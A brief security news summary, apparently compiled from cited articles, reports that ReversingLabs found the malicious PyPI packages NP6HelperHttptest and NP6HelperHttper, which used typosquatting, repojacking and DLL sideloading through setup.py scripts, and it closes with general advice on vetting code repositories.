Security researchers have observed an increase in malicious activities targeting open source platforms and code repositories [1] [2], including hosting command and control infrastructure [1], storing stolen data [1] [2], and distributing malware [1] [2].
Description
ReversingLabs discovered suspicious packages on PyPI named NP6HelperHttptest and NP6HelperHttper [1] [2], utilizing DLL sideloading to execute code discreetly [1] [2]. These packages employed typosquatting and repojacking tactics to deceive developers [1] [2], posing as legitimate NP6 packages from Chapvision [1] [2]. Upon notification [1], Chapvision confirmed that one of their employees had published the helper tools [1], leading to their removal from PyPI [1]. The malicious packages were found to execute hidden malicious code within setup.py scripts [1], posing significant security risks [1]. The Lazarus Group [1] [2], a North Korea linked threat actor [1] [2], has previously used DLL sideloading in attacks to download and execute payloads [1] [2]. ReversingLabs’ research suggests a broader campaign involving multiple packages and sophisticated tactics relying on DLL sideloading [1] [2], highlighting the evolving threat landscape [1]. Cybersecurity researchers have discovered that the malicious packages [3], NP6HelperHttp test and NP6HelperHttper [1] [2] [3], were downloaded multiple times before being deleted [3]. These packages are misspellings of legitimate tools released by ChapsVision [3], with the goal of tricking developers into downloading malicious versions [3]. The malicious libraries contain a setup.py script designed to download vulnerable files and sideload a malicious DLL [3], evading detection by security software [3]. Evidence suggests that these packages are part of a broader campaign involving similar executables susceptible to DLL sideloading [3].
Conclusion
The discovery of malicious activities targeting open source platforms and code repositories underscores the importance of vigilance and security measures in the digital landscape. Mitigating the risks posed by malicious packages such as NP6HelperHttptest and NP6HelperHttper requires increased awareness, thorough vetting of code repositories, and prompt action upon detection. The evolving tactics and techniques employed by threat actors, such as DLL sideloading [1] [2], necessitate ongoing research and collaboration within the cybersecurity community to stay ahead of emerging threats.
References
[1] https://www.infosecurity-magazine.com/news/typosquatting-repojacking-tactics/
[2] https://ciso2ciso.com/new-typosquatting-and-repojacking-tactics-uncovered-on-pypi-source-www-infosecurity-magazine-com/
[3] https://paxtowillson.wordpress.com/2024/02/21/new-malicious-pypi-kit-captured-using-hidden-sideloading-strategy/
